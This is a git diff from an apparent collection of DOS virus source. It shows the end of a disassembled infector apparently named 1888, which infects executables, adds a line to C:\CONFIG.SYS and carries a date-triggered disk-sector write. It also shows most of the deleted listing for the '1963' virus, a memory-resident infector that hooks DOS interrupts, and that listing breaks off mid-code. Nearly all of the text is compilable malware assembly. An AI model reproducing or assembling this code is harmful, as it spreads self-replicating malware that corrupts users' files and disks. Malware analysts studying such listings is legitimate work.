SUBROUTINE -; - -sub_0A11 proc near - lea si,data_019D ; Load effective addr - mov di,si - xor dl,dl ; Zero register - mov ah,47h ; 'G' - int 21h ; DOS Services ah=function 47h - ; get present dir,drive dl,1=a: - ; ds:si=ASCIIZ directory name - mov cx,30h - mov al,0 - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al - mov cx,di - sub cx,si - lea di,data_013A ; ('\DANGER\1888') Load effective addr - mov al,5Ch ; '\' - stosb ; Store al to es:[di] - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - retn -sub_0A11 endp - - -; -; SUBROUTINE -; - -sub_0A32 proc near - mov data_0182,0 - lea bx,cs:[160h] ; Load effective addr - add bx,20h - mov data_0180,bx - sub bx,20h - lea dx,data_015A+4 ; ('*') Load effective addr - mov cx,33h - mov ah,4Eh ; 'N' - int 21h ; DOS Services ah=function 4Eh - ; find 1st filenam match @ds:dx - jc loc_0A81 ; Jump if carry Set -loc_0A52: - lea di,data_019D ; Load effective addr - add di,1Eh - cmp byte ptr [di],2Eh ; '.' - je loc_0A7B ; Jump if equal - mov si,di - mov cx,20h - mov al,0 - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al - mov cx,di - sub cx,si - mov di,bx - add bx,cx - cmp bx,data_0180 - ja loc_0A81 ; Jump if above - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - inc data_0182 -loc_0A7B: - mov ah,4Fh ; 'O' - int 21h ; DOS Services ah=function 4Fh - ; find next filename match - jnc loc_0A52 ; Jump if carry=0 -loc_0A81: - lea bx,cs:[160h] ; Load effective addr - mov data_0180,bx - retn -sub_0A32 endp - - -; -; SUBROUTINE -; - -sub_0A8A proc near - cmp data_0182,0 - je loc_ret_0AAE ; Jump if equal - lea dx,data_013A ; ('\DANGER\1888') Load effective addr - mov ah,3Bh ; ';' - int 21h ; DOS Services ah=function 3Bh - ; set current dir, path @ ds:dx - mov dx,data_0180 - mov di,dx - mov ah,3Bh ; ';' - int 21h ; DOS Services ah=function 3Bh - ; set current dir, path @ ds:dx - mov al,0 - mov cx,20h - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al - mov data_0180,di - -loc_ret_0AAE: - retn -sub_0A8A endp - - -; -; SUBROUTINE -; - -sub_0AAF proc near - mov ax,data_0104 - and al,1Fh - cmp al,1Eh - retn -sub_0AAF endp - - -; -; SUBROUTINE -; - -sub_0AB7 proc near - lea dx,data_0194 ; Load effective addr - cmp data_011E,0 - je loc_0AC6 ; Jump if equal - lea dx,data_018E ; Load effective addr -loc_0AC6: - mov cx,23h - mov ah,4Eh ; 'N' - int 21h ; DOS Services ah=function 4Eh - ; find 1st filenam match @ds:dx - retn -sub_0AB7 endp - - -; -; SUBROUTINE -; - -sub_0ACE proc near - lea si,data_019D ; Load effective addr - add si,15h - lea di,data_0103 ; Load effective addr - mov cx,16h - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - retn -sub_0ACE endp - - -; -; SUBROUTINE -; - -sub_0ADF proc near - pushf ; Push flags - mov cx,data_0104 - or cl,1Fh - and cl,0FEh - mov dx,data_0106 - mov ax,5701h - int 21h ; DOS Services ah=function 57h - ; set file date+time, bx=handle - ; cx=time, dx=time - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - lea dx,data_010C ; ('1888.COM') Load effective addr - xor ch,ch ; Zero register - mov cl,data_0103 - mov ax,4301h - int 21h ; DOS Services ah=function 43h - ; set attrb cx, filename @ds:dx - popf ; Pop flags - retn -sub_0ADF endp - - -; -; SUBROUTINE -; - -sub_0B08 proc near - lea dx,data_010C ; ('1888.COM') Load effective addr - xor cx,cx ; Zero register - mov ax,4301h - int 21h ; DOS Services ah=function 43h - ; set attrb cx, filename @ds:dx - jc loc_ret_0B1C ; Jump if carry Set - mov ax,3D02h - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - mov bx,ax - -loc_ret_0B1C: - retn -sub_0B08 endp - - -; -; SUBROUTINE -; - -sub_0B1D proc near - push ds - mov ax,word ptr data_012C+2 - mov ds,ax - mov cx,100h - xor dx,dx ; Zero register - mov ah,3Fh ; '?' - int 21h ; DOS Services ah=function 3Fh - ; read file, bx=file handle - ; cx=bytes to ds:dx buffer - cmp word ptr ds:d_9E01_0000_e,5A4Dh - nop ;*ASM fixup - sign extn byte - je loc_0B38 ; Jump if equal - stc ; Set carry flag - jmp loc_0BB7 -loc_0B38: - call sub_0BB9 - push ax - mov ax,di - and ax,0Fh - mov cx,10h - xor dx,dx ; Zero register - sub cx,ax - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - jnc loc_0B51 ; Jump if carry=0 - jmp short loc_0BB7 - db 90h -loc_0B51: - mov si,ax - mov cx,100h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - jc loc_0BB7 ; Jump if carry Set - pop dx - mov ax,di - add ax,si - add ax,100h - cmp ax,200h - jb loc_0B6D ; Jump if below - and ax,1FFh - inc dx -loc_0B6D: - mov cl,4 - shr ax,cl ; Shift w/zeros fill - dec dx - mov cl,5 - shl dx,cl ; Shift w/zeros fill - sub dx,ds:d_9E01_0008_e - add ax,dx - sub ax,10h - mov ds:d_9E01_0016_e,ax - mov word ptr ds:d_9E01_0014_e,100h - push ds - mov ax,cs - mov ds,ax - mov cx,data_011C - mov dx,100h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - pop ds - jc loc_0BB7 ; Jump if carry Set - call sub_0BB9 - mov ds:d_9E01_0002_e,di - mov ds:d_9E01_0004_e,ax - mov ax,4200h - xor dx,dx ; Zero register - xor cx,cx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - jc loc_0BB7 ; Jump if carry Set - mov cx,100h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer -loc_0BB7: - pop ds - retn -sub_0B1D endp - - -; -; SUBROUTINE -; - -sub_0BB9 proc near - mov ax,4202h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - mov di,ax - and di,1FFh - mov cl,9 - shr ax,cl ; Shift w/zeros fill - mov cl,7 - shl dx,cl ; Shift w/zeros fill - add ax,dx - inc ax - retn -sub_0BB9 endp - - -; -; SUBROUTINE -; - -sub_0BD4 proc near - mov ax,data_0108 - mov data_0120,ax - mov cx,data_011C - cmp cx,ax - jb loc_0BEA ; Jump if below - mov data_0120,cx - mov cx,data_0108 -loc_0BEA: - push ds - mov ax,word ptr data_012C+2 - mov ds,ax - xor dx,dx ; Zero register - mov ah,3Fh ; '?' - int 21h ; DOS Services ah=function 3Fh - ; read file, bx=file handle - ; cx=bytes to ds:dx buffer - pop ds - jc loc_ret_0C3F ; Jump if carry Set - mov ax,4200h - xor dx,dx ; Zero register - xor cx,cx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - jc loc_ret_0C3F ; Jump if carry Set - mov dx,100h - mov cx,data_011C - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - jc loc_ret_0C3F ; Jump if carry Set - cmp ax,data_0108 - ja loc_0C2E ; Jump if above - mov ax,4200h - mov dx,data_0108 - mov data_0120,dx - xor cx,cx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - jc loc_ret_0C3F ; Jump if carry Set - mov cx,data_011C - jmp short loc_0C32 -loc_0C2E: - mov cx,data_0108 -loc_0C32: - push ds - mov ax,word ptr data_012C+2 - mov ds,ax - xor dx,dx ; Zero register - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - pop ds - -loc_ret_0C3F: - retn -sub_0BD4 endp - - -; -; SUBROUTINE -; - -sub_0C40 proc near - cmp data_011B,2 - ja loc_0C4A ; Jump if above - xor ax,ax ; Zero register - retn -loc_0C4A: - mov al,data_0133 - and al,1 - retn -sub_0C40 endp - - -; -; SUBROUTINE -; - -sub_0C50 proc near - cmp data_0133,0Fh - jb loc_0C69 ; Jump if below - mov al,data_0135 - cmp al,13h - jb loc_0C69 ; Jump if below - mov ax,40h - mov es,ax - mov byte ptr es:d_0040_004A_e,23h ; '#' -loc_0C69: - cmp data_0133,0Dh - jne loc_ret_0C86 ; Jump if not equal - cmp data_0134,5 - jne loc_ret_0C86 ; Jump if not equal - mov ax,301h - mov cx,1 - mov dx,50h - xor bx,bx ; Zero register - mov es,bx - int 13h ; Disk dl=drive ? ah=func 03h - ; write sectors from mem es:bx - ; al=#,ch=cyl,cl=sectr,dh=head - -loc_ret_0C86: - retn -sub_0C50 endp - - -; -; SUBROUTINE -; - -sub_0C87 proc near - mov data_019B,1 - lea dx,data_05C1 ; Load effective addr - mov cx,27h - mov ah,4Eh ; 'N' - int 21h ; DOS Services ah=function 4Eh - ; find 1st filenam match @ds:dx - jnc loc_0CC6 ; Jump if carry=0 - mov ah,3Ch ; '<' - mov cx,6 - int 21h ; DOS Services ah=function 3Ch - ; create/truncate file @ ds:dx - mov bx,ax - lea dx,data_05EE ; Load effective addr - mov cx,data_070A - mov si,dx - add si,data_00B3_e - mov ax,data_0130 - mov [si],ax - mov ah,data_0132 - mov [si+2],ah - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - jc loc_0D1F ; Jump if carry Set -loc_0CC6: - lea dx,data_05C7 ; ('C:\CONFIG.SYS') Load effective add - mov cx,27h - mov ah,4Eh ; 'N' - int 21h ; DOS Services ah=function 4Eh - ; find 1st filenam match @ds:dx - jc loc_0D1F ; Jump if carry Set - call sub_0ACE - xor cx,cx ; Zero register - mov ax,4301h - int 21h ; DOS Services ah=function 43h - ; set attrb cx, filename @ds:dx - mov ax,3D02h - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - mov bx,ax - jc loc_0D1F ; Jump if carry Set - mov cx,data_0108 - push es - push ds - mov ax,word ptr data_012C+2 - mov ds,ax - mov es,ax - xor dx,dx ; Zero register - mov ah,3Fh ; '?' - int 21h ; DOS Services ah=function 3Fh - ; read file, bx=file handle - ; cx=bytes to ds:dx buffer - pop ds - mov dx,ax - mov ax,0FFFFh - xor di,di ; Zero register - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al - cmp ax,es:[di-1] - pop es - jz loc_0D1F ; Jump if zero - mov ax,4200h - xor cx,cx ; Zero register - dec dx - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - jc loc_0D1F ; Jump if carry Set - lea dx,data_05D5 ; ('DEVICE =') Load effective addr - mov cx,19h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer -loc_0D1F: - call sub_0ADF - retn -sub_0C87 endp - - inc bx - cmp bl,[si-1] - inc word ptr [bx+si] - inc bx - cmp bl,[si+43h] - dec di - dec si - inc si - dec cx - inc di - db 2Eh, 53h, 59h, 53h, 00h - db 'DEVICE =' - db 0FFh,0FFh - db ' COUNTRY.SYS', 0Dh, 0Ah - db 1Ah,0FFh,0FFh,0FFh,0FFh, 40h - db 0C8h, 16h, 00h, 21h, 00h - db 'hgt42 ' - db 00h, 00h, 00h, 00h, 2Eh, 89h - db 1Eh, 12h, 00h, 2Eh, 8Ch, 06h - db 14h, 00h,0CBh, 1Eh, 06h, 0Eh - db 1Fh,0C4h, 3Eh, 12h, 00h, 26h - db 8Ah, 45h, 02h, 3Ch, 00h, 75h - db 03h,0E8h, 82h, 00h - db 0Dh, 00h, 10h, 26h, 89h, 45h - db 03h, 07h, 1Fh,0CBh, 50h, 53h - db 51h, 1Eh - db 0E4h, 60h,0A8h, 80h, 75h, 30h - db 2Eh, 8Bh, 1Eh,0A9h, 00h, 3Ah - db 0C7h, 75h, 27h,0B8h, 40h, 00h - db 8Eh,0D8h,0E8h, 28h, 00h, 25h - db 05h, 00h, 8Bh,0C8h - db 0BBh, 1Ch, 00h - -locloop_0DB1: - mov ax,cs:data_00A9_e - mov [bx],ax - add bx,2 - cmp bx,3Fh - jb loc_0DC2 ; Jump if below - mov bx,1Eh -loc_0DC2: - mov word ptr ds:[1Ch],bx - loop locloop_0DB1 ; Loop if cx > 0 - -loc_0DC8: - pop ds - pop cx - pop bx - pop ax - jmp dword ptr cs:data_00A3_e - -; -; SUBROUTINE -; - -sub_0DD1 proc near - mov ax,cs:data_00A7_e - push ax - and ah,0B4h - pop ax - jp loc_0DDD ; Jump if parity=1 - stc ; Set carry flag -loc_0DDD: - rcl ax,1 ; Rotate thru carry - mov cs:data_00A7_e,ax - retn -sub_0DD1 endp - - db 'hgt42 ' - db 00h, 56h, 31h, 00h, 46h, 52h - db 44h, 00h, 00h, 00h, 00h, 00h - db 00h, 65h, 12h, 65h, 73h, 74h - db 6Eh, 12h, 1Fh, 14h, 31h,0CDh - db 0ABh,0EFh - db 06h, 57h,0B4h, 2Ah,0CDh, 21h - db 8Ah,0E6h, 3Bh, 0Eh,0B3h, 00h - db 74h, 03h, 80h,0C4h - db 0Ch -loc_0E17: - sub ah,ds:data_00B5_e - cmp ah,3 - jb loc_0E5D ; Jump if below - mov ds:data_00B5_e,dh - mov ds:data_00B3_e,cx - mov ah,2Ch ; ',' - int 21h ; DOS Services ah=function 2Ch - ; get time, cx=hrs/min, dx=sec - mov ds:data_00A7_e,dx - call sub_0DD1 - mov bx,ax - and bx,3 - nop ;*ASM fixup - sign extn byte - mov al,ds:data_00AB_e[bx] - mov ah,ds:data_00AF_e[bx] - mov ds:data_00A9_e,ax - mov ax,3516h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov ds:data_00A3_e,bx - mov bx,es - mov word ptr ds:data_00A3_e+2,bx - cli ; Disable interrupts -;* mov dx,offset loc_003E ;* - db 0BAh, 3Eh, 00h - mov ax,2516h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - sti ; Enable interrupts -loc_0E5D: - pop di - pop es - mov word ptr es:[di+0Eh],0B6h - mov es:[di+10h],cs - xor ax,ax ; Zero register - retn - db 1Ch - db 01h, 8Bh, 1Eh, 28h, 01h,0A1h - db 26h, 01h, 8Eh,0D0h, 8Bh, 26h - db 24h, 01h, 83h,0ECh, 04h, 8Bh - db 0F4h, 80h, 3Eh, 1Fh, 01h, 00h - db 75h, 28h,0BFh, 00h, 01h, 36h - db 89h, 3Ch, 8Bh,0FBh, 36h, 89h - db 7Ch, 02h, 33h,0FFh, 36h, 89h - db 7Ch, 04h - db 0BFh, 00h, 01h, 8Bh, 36h, 22h - db 01h, 03h,0F7h, 8Bh, 0Eh, 1Ch - db 01h, 8Ch,0D8h, 8Eh,0C0h,0F3h - db 0A4h,0EBh, 16h, 90h -loc_0EAF: - mov di,bx - add di,10h - mov ax,ds:data_0016_e - add di,ax - mov ss:[si+2],di - mov di,word ptr ds:data_0012_e+2 - mov ss:[si],di -loc_0EC4: - mov ds,bx - mov es,bx - retf ; Return far - db 8Ch,0D0h, 2Eh,0A3h, 26h, 01h - db 2Eh, 89h, 26h, 24h, 01h, 8Ch - db 0C8h, 8Eh,0D0h,0BCh,0F7h, 01h - db 1Eh, 8Eh,0D8h, 58h,0A3h, 28h - db 01h,0E8h,0E6h,0FAh, 8Ch,0C8h - db 8Eh,0C0h,0E8h, 6Dh,0FAh - db 0BAh, 9Dh, 01h,0B4h, 1Ah,0CDh - db 21h,0E8h, 1Bh,0FBh,0E8h, 0Eh - db 0FBh, 73h, 03h,0E9h, 9Eh, 00h -loc_0EFE: - call sub_0989 - jc loc_0F06 ; Jump if carry Set - jmp loc_0F9C -loc_0F06: - call sub_099C - call sub_0A32 - mov data_011E,0 -loc_0F11: - call sub_0AB7 - jc loc_0F62 ; Jump if carry Set -loc_0F16: - cmp data_019C,4 - ja loc_0F9C ; Jump if above - call sub_0ACE - call sub_0AAF - jnc loc_0F5C ; Jump if carry=0 - cmp data_010A,4 - ja loc_0F5C ; Jump if above - call sub_0B08 - jc loc_0F9C ; Jump if carry Set - cmp data_011E,0 - je loc_0F3D ; Jump if equal - call sub_0B1D - jmp short loc_0F40 -loc_0F3D: - call sub_0BD4 -loc_0F40: - call sub_0ADF - jc loc_0F9C ; Jump if carry Set - inc data_019C - cmp data_019B,1 - je loc_0F5C ; Jump if equal - call sub_0C40 - jz loc_0F5C ; Jump if zero - call sub_0C87 - jc loc_0F9C ; Jump if carry Set - jmp short loc_0F11 -loc_0F5C: - mov ah,4Fh ; 'O' - int 21h ; DOS Services ah=function 4Fh - ; find next filename match - jnc loc_0F16 ; Jump if carry=0 -loc_0F62: - cmp data_011E,1 - je loc_0F70 ; Jump if equal - mov data_011E,1 - jmp short loc_0F11 -loc_0F70: - mov data_011E,0 - cmp data_019A,0 - jne loc_0F8B ; Jump if not equal - lea dx,data_015A ; ('C:\') Load effective addr - mov ah,3Bh ; ';' - int 21h ; DOS Services ah=function 3Bh - ; set current dir, path @ ds:dx - mov data_019A,0FFh - jmp short loc_0F11 -loc_0F8B: - cmp data_0182,0 - je loc_0F9C ; Jump if equal - call sub_0A8A - dec data_0182 - jmp loc_0F11 -loc_0F9C: - lea dx,data_013A ; ('\DANGER\1888') Load effective addr - mov ah,3Bh ; ';' - int 21h ; DOS Services ah=function 3Bh - ; set current dir, path @ ds:dx - call sub_0C40 - jz loc_0FAC ; Jump if zero - call sub_0C50 -loc_0FAC: - mov ax,word ptr data_012C+2 - mov es,ax - mov cx,5Bh - mov si,offset data_070C - xor di,di ; Zero register - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - call sub_09EE - call data_012C - -seg_a ends - - - - end start diff --git a/0-9/1963 (8).ASM b/0-9/1963 (8).ASM deleted file mode 100755 index 7449bfa..0000000 --- a/0-9/1963 (8).ASM +++ /dev/null @@ -1,1292 +0,0 @@ - -PAGE 59,132 - -; -; -; 1963 VIRUS -; -; disassembly by -; -; DecimatoR / SKISM -; -; 01/15/92 Compile with TASM 2.0 DW 717-367-3501 -; - -data_1e equ 4 ; (0000:0004=7FBh) -data_2e equ 6 ; (0000:0006=70h) -data_3e equ 4Ch ; (0000:004C=88h) -data_4e equ 84h ; (0000:0084=16h) -data_6e equ 0Ah ; (0046:000A=0) -data_7e equ 16h ; (0046:0016=0) -data_8e equ 2Ch ; (0046:002C=50h) -data_9e equ 8ABh ; (0046:08AB=4146h) -data_10e equ 8ADh ; (0046:08AD=3154h) -data_11e equ 0Ah ; (08D4:000A=2F9h) -data_12e equ 0Ch ; (08D4:000C=3872h) -data_13e equ 100h ; (08D4:0100=0DFh) -data_14e equ 1 ; (4815:0001=0FFFFh) -data_15e equ 100h ; (4816:0100=0FFh) -data_16e equ 1 ; (8343:0001=0FFFFh) -data_17e equ 0Ah ; (8344:000A=0) -data_18e equ 0Eh ; (8344:000E=8344h) -data_49e equ 900h ; (8344:0900=0) -data_50e equ 902h ; (8344:0902=0) -data_51e equ 904h ; (8344:0904=8344h) -data_52e equ 906h ; (8344:0906=0) -data_53e equ 9EFh ; (8344:09EF=0) -data_54e equ 10AFh ; (8344:10AF=0) -data_55e equ 10B1h ; (8344:10B1=0) -data_56e equ 10B3h ; (8344:10B3=0) - -seg_a segment byte public - assume cs:seg_a, ds:seg_a - - - org 100h - -virus proc far - -start: - mov ah,30h ; '0' - int 21h ; DOS Services ah=function 30h - ; get DOS version number ax - cmp al,3 - jb loc_1 ; Jump if below - mov ax,1200h - int 2Fh ; Multiplex/Spooler al=func 00h - ; get installed status - cmp al,0FFh -loc_1: - mov ax,0Bh - jc loc_4 ; Jump if carry Set - mov ah,4Ah ; 'J' - mov bx,140h - int 21h ; DOS Services ah=function 4Ah - ; change mem allocation, bx=siz - jc loc_4 ; Jump if carry Set - cli ; Disable interrupts - push cs - pop ss - mov sp,13FEh - call sub_1 ; (01EB) - sti ; Enable interrupts - mov ax,ds:data_8e ; (0046:002C=50h) - or ax,ax ; Zero ? - jz loc_5 ; Jump if zero - call sub_13 ; (07EC) - mov es,ax - xor di,di ; Zero register - xor ax,ax ; Zero register -loc_2: - scasw ; Scan es:[di] for ax - jnz loc_2 ; Jump if not zero - scasw ; Scan es:[di] for ax - mov dx,di - push es - pop ds - mov ah,48h ; 'H' - mov bx,0FFFFh - int 21h ; DOS Services ah=function 48h - ; allocate memory, bx=bytes/16 - mov ah,48h ; 'H' - int 21h ; DOS Services ah=function 48h - ; allocate memory, bx=bytes/16 - mov es,ax - mov ah,49h ; 'I' - int 21h ; DOS Services ah=function 49h - ; release memory block, es=seg - xor ax,ax ; Zero register - mov cx,bx - mov bx,es - -locloop_3: - push cx - mov cx,8 - xor di,di ; Zero register - rep stosw ; Rep when cx >0 Store ax to es:[di] - inc bx - mov es,bx - pop cx - loop locloop_3 ; Loop if cx > 0 - - push cs - pop es - mov bx,data_51e ; (8344:0904=44h) - mov di,bx - stosw ; Store ax to es:[di] - mov al,80h - stosw ; Store ax to es:[di] - mov ax,cs - stosw ; Store ax to es:[di] - mov ax,5Ch - stosw ; Store ax to es:[di] - mov ax,cs - stosw ; Store ax to es:[di] - mov ax,6Ch - stosw ; Store ax to es:[di] - mov ax,cs - stosw ; Store ax to es:[di] - mov ax,4B00h - int 21h ; DOS Services ah=function 4Bh - ; run progm @ds:dx, parm @es:bx -loc_4: - push cs - pop ds - call sub_13 ; (07EC) - jmp dword ptr cs:data_17e ; (8344:000A=0) -loc_5: - mov ax,1220h - mov bx,5 - int 2Fh ; ??INT Non-standard interrupt. - push bx - dec bx - dec bx - mov es:[di],bl - mov ax,1216h - int 2Fh ; ??INT Non-standard interrupt. - dec bx - dec bx - mov es:[di],bx - mov ah,48h ; 'H' - mov bx,0FFFFh - int 21h ; DOS Services ah=function 48h - ; allocate memory, bx=bytes/16 - mov ah,48h ; 'H' - int 21h ; DOS Services ah=function 48h - ; allocate memory, bx=bytes/16 - mov ds,ax - pop bx - mov ax,4200h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - mov ah,3Fh ; '?' - mov dx,data_15e ; (4816:0100=0FFh) - mov cx,es:[di+11h] - int 21h ; DOS Services ah=function 3Fh - ; read file, cx=bytes, to ds:dx - jc loc_4 ; Jump if carry Set - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - mov ah,26h ; '&' - mov dx,ds - int 21h ; DOS Services ah=function 26h - ; create progm seg prefix dx - dec dx - mov es,dx - mov es:data_14e,ds ; (4815:0001=0FFFFh) - inc dx - mov es,dx - mov ss,dx - mov sp,0FFFEh - push ds - mov ax,100h - push ax - retf ; Return far - -virus endp - -; -; SUBROUTINE -; - -sub_1 proc near - push ds - mov ax,1203h - int 2Fh ; Multiplex/Spooler al=func 03h - ; remove all files from queue - mov cs:data_51e,ds ; (8344:0904=8344h) - xor si,si ; Zero register - mov ds,si - mov di,288h - mov si,cs - xchg di,ds:data_1e ; (0000:0004=7FBh) - xchg si,ds:data_2e ; (0000:0006=70h) - pushf ; Push flags - pushf ; Push flags - pushf ; Push flags - mov bp,sp - or byte ptr [bp+1],1 - popf ; Pop flags - pushf ; Push flags - pushf ; Push flags - mov word ptr cs:data_52e,8AFh ; (8344:0906=0) - mov ah,1 - call dword ptr ds:data_3e ; (0000:004C=2288h) - popf ; Pop flags - mov word ptr cs:data_52e,8ABh ; (8344:0906=0) - mov ah,0Bh - call dword ptr ds:data_4e ; (0000:0084=1716h) - popf ; Pop flags - mov ds:data_1e,di ; (0000:0004=7FBh) - mov ds:data_2e,si ; (0000:0006=70h) - pop ds - push ds - push es - mov bx,cs - mov bp,2AEh - mov ax,ds:data_9e ; (0046:08AB=4146h) - mov dx,ds:data_10e ; (0046:08AD=3154h) - xor si,si ; Zero register - mov ds,si - cmp ax,ds:data_4e ; (0000:0084=1716h) - jne loc_6 ; Jump if not equal - cmp dx,word ptr ds:data_4e+2 ; (0000:0086=2C7h) - jne loc_6 ; Jump if not equal - mov ds:data_4e,bp ; (0000:0084=1716h) - mov word ptr ds:data_4e+2,bx ; (0000:0086=2C7h) - jmp short loc_10 ; (0285) -loc_6: - mov ax,8ABh - mov es,bx - mov cx,10h - cld ; Clear direction - -locloop_7: - mov di,ax - mov ds,dx - cmpsw ; Cmp [si] to es:[di] - jnz loc_9 ; Jump if not zero - cmpsw ; Cmp [si] to es:[di] - jnz loc_8 ; Jump if not zero - mov [si-4],bp - mov [si-2],bx -loc_8: - dec si - dec si -loc_9: - dec si - loop locloop_7 ; Loop if cx > 0 - - xchg si,cx - inc dx - cmp dx,bx - jne locloop_7 ; Jump if not equal -loc_10: - pop es - pop ds - retn -sub_1 endp - - push bp - mov bp,sp - push ax - mov ax,[bp+4] - cmp ax,cs:data_51e ; (8344:0904=8344h) - ja loc_11 ; Jump if above - push bx - mov bx,cs:data_52e ; (8344:0906=0) - mov cs:[bx+2],ax - mov ax,[bp+2] - mov cs:[bx],ax - and byte ptr [bp+7],0FEh - pop bx -loc_11: - pop ax - pop bp - iret ; Interrupt return - db 55h, 8Bh,0ECh, 80h,0FCh, 48h - db 74h, 0Ah, 80h,0FCh, 4Ah, 74h - db 05h, 3Dh, 03h, 4Bh, 75h, 0Ch - db 0E8h, 89h, 05h,0E8h,0AFh, 05h - db 9Ch,0E8h, 87h, 05h,0EBh, 55h - db 80h,0FCh, 31h, 74h, 05h, 80h - db 0FCh - db 4Ch, 75h, 0Dh -loc_12: - push bx - mov bx,13h -loc_13: - call sub_5 ; (0532) - dec bx - jns loc_13 ; Jump if not sign - pop bx - jmp short loc_23 ; (0342) -loc_14: - cmp ah,0Fh - je loc_15 ; Jump if equal - cmp ah,10h - je loc_15 ; Jump if equal - cmp ah,17h - je loc_15 ; Jump if equal - cmp ah,23h ; '#' - jne loc_16 ; Jump if not equal -loc_15: - call sub_15 ; (081F) - jmp short loc_23 ; (0342) -loc_16: - cmp ah,3Fh ; '?' - jne loc_20 ; Jump if not equal - call sub_5 ; (0532) - jnc loc_18 ; Jump if carry=0 - mov ax,5 -loc_17: - jmp loc_37 ; (0403) -loc_18: - jnz loc_23 ; Jump if not zero - call sub_22 ; (0875) - jc loc_17 ; Jump if carry Set - pushf ; Push flags - call sub_24 ; (0884) - push ds - pop es - mov di,dx - call sub_11 ; (0785) - call sub_25 ; (0896) -loc_19: - popf ; Pop flags - pop bp - retf 2 ; Return far -loc_20: - cmp ah,3Dh ; '=' - je loc_21 ; Jump if equal - cmp ah,43h ; 'C' - je loc_21 ; Jump if equal - cmp ah,56h ; 'V' - jne loc_22 ; Jump if not equal -loc_21: - call sub_3 ; (0519) - jmp short loc_23 ; (0342) -loc_22: - cmp ah,3Eh ; '>' - jne loc_24 ; Jump if not equal - call sub_5 ; (0532) -loc_23: - push word ptr [bp+6] - popf ; Pop flags - pop bp - cli ; Disable interrupts - jmp dword ptr cs:data_20 ; (8344:08AB=0) -loc_24: - cmp ah,14h - je loc_25 ; Jump if equal - cmp ah,21h ; '!' - je loc_25 ; Jump if equal - cmp ah,27h ; ''' - je loc_25 ; Jump if equal - jmp loc_35 ; (03DE) -loc_25: - call sub_15 ; (081F) - jnc loc_27 ; Jump if carry=0 -loc_26: - pop bp - mov al,1 - iret ; Interrupt return -loc_27: - jnz loc_23 ; Jump if not zero - call sub_24 ; (0884) - call sub_14 ; (0814) - cmp ah,14h - jne loc_28 ; Jump if not equal - mov ax,[si+0Ch] - mov dx,80h - mul dx ; dx:ax = reg * ax - xor bx,bx ; Zero register - add al,[si+20h] - adc ah,bl - adc bx,dx - xchg ax,bx - jmp short loc_29 ; (038F) -loc_28: - mov ax,[si+23h] - mov bx,[si+21h] -loc_29: - mov cx,[si+0Eh] - mul cx ; dx:ax = reg * ax - jnc loc_31 ; Jump if carry=0 -loc_30: - call sub_25 ; (0896) - jmp short loc_26 ; (0364) -loc_31: - xchg ax,bx - mul cx ; dx:ax = reg * ax - add dx,bx - jc loc_30 ; Jump if carry Set - mov cs:data_37,ax ; (8344:08D0=0) - mov cs:data_38,dx ; (8344:08D2=0) - mov cs:data_39,cx ; (8344:08D4=0) - call sub_25 ; (0896) - call sub_22 ; (0875) - or al,al ; Zero ? - jz loc_32 ; Jump if zero - cmp al,3 - jne loc_34 ; Jump if not equal -loc_32: - call sub_24 ; (0884) - cmp ah,27h ; ''' - mov ax,cs:data_39 ; (8344:08D4=0) - jnz loc_33 ; Jump if not zero - mul cx ; dx:ax = reg * ax - jc loc_30 ; Jump if carry Set -loc_33: - push ax - mov ah,2Fh ; '/' - int 21h ; DOS Services ah=function 2Fh - ; get DTA ptr into es:bx - mov di,bx - pop ax - call sub_11 ; (0785) - call sub_25 ; (0896) -loc_34: - pop bp - iret ; Interrupt return -loc_35: - cmp ax,4B00h - je loc_38 ; Jump if equal - cmp ax,4B01h - je loc_36 ; Jump if equal - jmp loc_23 ; (0342) -loc_36: - call sub_2 ; (042F) - jc loc_37 ; Jump if carry Set - push si - push di - push ds - push cs - pop ds - mov si,offset data_41 ; (8344:08E2=0) - lea di,[bx+0Eh] ; Load effective addr - cld ; Clear direction - movsw ; Mov [si] to es:[di] - movsw ; Mov [si] to es:[di] - movsw ; Mov [si] to es:[di] - movsw ; Mov [si] to es:[di] - pop 